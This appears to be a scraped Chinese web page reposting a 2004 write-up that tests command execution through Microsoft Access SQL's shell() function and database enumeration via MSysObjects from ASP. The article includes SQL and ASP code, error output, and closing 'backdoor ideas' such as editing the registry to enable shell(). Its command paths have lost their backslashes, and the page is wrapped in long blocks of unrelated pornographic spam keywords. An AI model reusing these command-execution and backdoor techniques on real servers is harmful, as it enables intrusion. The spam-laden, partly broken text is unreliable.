国产激情自拍_国产9色视频_丁香花在线电影小说观看 _久久久久国产精品嫩草影院

首頁 > 數據庫 > Access > 正文

Access的一些測試

2024-09-07 19:02:54
字體:
來源:轉載
供稿:網友

本文作者:SuperHei
文章性質:原創
發布日期:2004-09-16

我們先在accessl里直接sql查詢:

SELECT shell('c:winntsystem32cmd.exe /c dir c: >c:123456.txt');


“運行”得到結果:

C:>dir 123456.txt
驅動器 C 中的卷沒有標簽。
卷的序列號是 3CEE-A8A9

C: 的目錄

2004-01-09 22:29 1,718 123456.txt
1 個文件 1,718 字節
0 個目錄 1,224,527,872 可用字節
C:>type 123456.txt
驅動器 C 中的卷沒有標簽。
卷的序列號是 3CEE-A8A9

c: 的目錄

2004-01-07 15:35 44 1.txt
2004-07-15 05:15 49 11.txt
2004-01-09 22:29 0 123456.txt
2004-07-31 15:50 478 333.txt

成功執行,我們看看權限,語句改為:

SELECT shell('c:winntsystem32cmd.exe /c dir c: >c:3456.txt');

運行后:

C:>net user

KAK-E8UHOQQ9M6S 的用戶帳戶

----------------------------------------------
aa Administrator
IUSR_KAK-E8UHOQQ9M6S IWAM_KAK-E8UHOQQ9M6S
命令成功完成。

看來權限比較大(不過可能是繼承了運行access的用戶的權限,我用的是管理員權限運行的,對guest的沒有測試)

下面我們測試sp里執行,首先自己寫個asp,代碼如下:

< %
Set Conn = Server.CreateObject("ADODB.Connection")
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "select shell('c:winntsystem32cmd.exe /c dir c: > d:sss1.txt')"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
rs.close
set rs=nothing
'關閉連接
conn.close
set conn=nothing
response.write "sql為:" &sql

%>

運行這個asp,返回結果如下:

Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 錯誤 '80040e14'

表達式中 'shell' 函數未定義。

/test/lse/Connections/kaoo6.asp,行7

提示” 'shell' 函數未定義”,測試失敗,我把asp代碼里的
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
改為 dsn="Provider=Microsoft.Jet.OLEDB.3.5;Data Source="&Server.MapPath("q.mdb")

運行ie返回:

Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp,行242

ADODB.Connection 錯誤 '800a0e7a'

Provider cannot be found. It may not be properly installed.

/test/lse/Connections/kaoo8.asp,行5

Provider沒有安裝 沒有繼續測試.

2.關于暴庫的測試

這里使用MsysObjecs : 我們新建立個查詢,語句如下:

SELECT MSysObjects.DateCreate, MSysObjects.DateUpdate, SysObjects.Name, ysObjects.Type ROM MSysObjects;
MSysObjects.DateCreate 得到建立時間
MSysObjects.DateUpdate 更新時間
MSysObjects.Name 數據庫名稱
MSysObjects.Type 數據庫類型

我們執行上面的語句,直接得到結果:

我們放到asp里:

< %
Set Conn = Server.CreateObject("ADODB.Connection")
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT MSysObjects.DateCreate, MSysObjects.DateUpdate,MSysObjects.Name,MSysObjects.Type FROM MSysObjects;"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
rs.close
set rs=nothing
'關閉連接
conn.close
set conn=nothing
response.write "sql為:" &sql

%>

ie返回:

Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 錯誤 '80040e09'

不能讀取記錄;在 'MSysObjects' 上沒有讀取數據權限。

/test/lse/Connections/kaoo7.asp,行7

提示 不能讀取記錄;在 'MSysObjects' 上沒有讀取數據權限。 沒辦法了,這個辦法又夭折拉.

3.補充:

在iis5(Microsoft.Jet.OLEDB.4.0)我們不可以直接執行shell(據說在Jet 3.5 也就是在iis4的時代可以),在Jet.OLEDB.4.0默認的情況下不可以,但是可以設置,我們可以通過改注冊表等來實現,具體的不知道.

后門思路:

1,就是上面的改注冊表,讓Jet.OLEDB.4.0支持shell 這樣我們可以在asp里直接利用.
2.我們通過其他程序,直接對mdb文件操作,利用select shell()執行系統命令.

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
国产激情自拍_国产9色视频_丁香花在线电影小说观看 _久久久久国产精品嫩草影院
日本高清中文字幕| 国产黄色免费| 国内自拍视频在线观看| 欧美日韩**字幕一区| 性网站在线播放| 青青艹在线视频| 成年人在线观看| 国产九色在线| 日本中文字幕在线播放| 国产黄视频网站| 亚洲人在线播放| 丁香花在线电影小说观看| 国产私人影院| 超碰在线国产| 国产福利视频在线观看| 四虎国产精品永久| 午夜视频在线免费| 亚洲欧美自拍另类| 黄色片视频在线观看| 国产午夜视频| 一本久久精品| 国产一级黄色电影| 在线视频中文字幕久| 麻豆网站在线| 91极品在线| 国产探花在线观看| 欧美性猛交xxxx免费看久久| 国产精品伦理一区二区三区| 日本精品一区二区三区在线播放| 国产精品178页| 尤物视频在线看| www.大网伊人| 精品偷拍激情视频在线观看| 尤物网址在线观看| 超碰在线97国产| 伊人影院蕉久影院在线播放| 中文字幕网在线| 欧洲有码在线视频| 在线中文字幕第一页| 国产超碰在线观看| 精品国产高清自在线一区二区三区 | 国产精品剧情一区二区三区 | 国内自拍视频在线观看| 亚洲www色| 91在线超碰| 国产高清一区二区三区视频| 国产一级大片| 国产精品免费麻豆入口| 国产娇喘精品一区二区三区图片| 成人日韩欧美| 国产三级视频在线看| 综合激情亚洲| 中文字幕国产视频| 国产福利小视频在线观看 | 久草视频国产| 国产免费黄色| √天堂资源中文www| 国产二区视频在线观看| 国产精品18久久久久网站| 91麻豆免费在线视频| 四虎成人免费| 国产美女视频一区二区三区| 国产日韩欧美一区二区三区视频| 国产黄色av免费看| 在线观看的av| 久久精品最新免费国产成人| 中文字幕高清av| 中文字幕av高清| 久久国产精品黑丝| 国产黄色小视频| 国产在线视频福利| 在线色视频观看| 成网站在线观看人免费| 精品美女调教视频| 老师我好爽再深一点的视频| 国产精品视频福利一区二区| www免费在线观看视频| 国产网红在线观看| 超碰91在线| 国产porn在线| 国产小视频免费在线网址| 在线免费观看黄色av| 91福利在线免费| 麻豆国产视频| 在线黄色国产电影| 国产精品18久久久久网站| 欧美日韩亚洲第一页| 国产精美视频| 尤物视频免费在线观看| 最近久乱中文字幕| 男女午夜视频在线观看| 亚洲欧美一区二区三区在线播放| xxx国产精品| 精品国内自产拍在线视频| 久久久久久91精品色婷婷| 99在线播放| 国产福利在线观看| 国产精品69xx| 国产成+人+亚洲+欧美+综合| 国产美女高潮| 中文字幕在线影视资源| 青娱乐在线视频观看| 国产精品区一区二| 中文字幕成人乱码在线电影| 午夜视频99| 国产精品666| 92久久精品| 天天操夜夜添| 欧美xxxxx性| 另类视频在线| 午夜伦全在线观看| 国产天堂资源| 国产精品欧美色图| 精品福利影院| 天天草天天干| 激情丁香在线| 国产区在线看| 一本大道久久精品| 一色桃子av在线| 青青草原国产在线观看| 国产中文字幕在线| 国产网红在线| av在线不卡网站| 国产免费高清| 91九色在线看| 黄网站在线观看高清免费| 国产一二区在线观看| 18激情网站| 超碰免费在线播放| 国产精品9区| 日本电影在线观看| 国产精品69xx| 超碰在线免费播放| 国产精品xxx电影| 麻豆福利在线观看| 国产超碰在线| 1区2区3区在线| 日本成a人片在线观看| 国产一级黄色| 超碰在线免费播放| 精品电影在线| 中文字幕网站视频在线| av在线免费观看网| 18 激情视频在线| 国产一区在线视频观看| 精品剧情v国产在线观看| 最近中文字幕mv免费高清视频8 | 免费黄网站在线观看| 精品视频在线一区二区| √天堂中文在线| 国产女王在线**视频 | 亚洲精品一区中文字幕电影| 国产午夜视频| 国产污视频在线| 导航福利在线| 国产中文字幕在线视频| www.五月色.com| 一区二区三区四区在线免费视频| 日本中文字幕视频| 国产主播色在线| 国产在线资源| 最新亚洲精品国自产在线观看| 九九热在线视频| 国产在线传媒| 国产乱在线观看视频| 国产在线传媒| 最近中文字幕大全中文字幕免费| 国产精品一卡二卡三卡| 国产嫩草在线视频| 大香伊人久久| 中文字幕亚洲免费| 国产精品四虎| 国产三级在线| 精品极品三级久久久久| 小说区乱图片区| 九九热在线观看视频| 五月婷婷在线视频| 91青青在线视频| 亚洲成人国产综合| 国产免费黄视频在线观看| 国产精品久久麻豆| 中文资源在线网| 免费高清av| 国产福利片在线| 九色精品视频在线观看| 国产极品视频| 青青草免费在线视频| 国产乱码在线| 中文岛国精品亚洲一区| 可以免费看污视频的网站| 最新国产在线| 欧美一级久久久久久久久大| 国产午夜在线| www在线观看播放免费视频日本| 尤物视频在线看| 日本亚洲欧美| 国产高清在线| 国产永久av在线| 日韩在线天堂| 在线观看av的网站|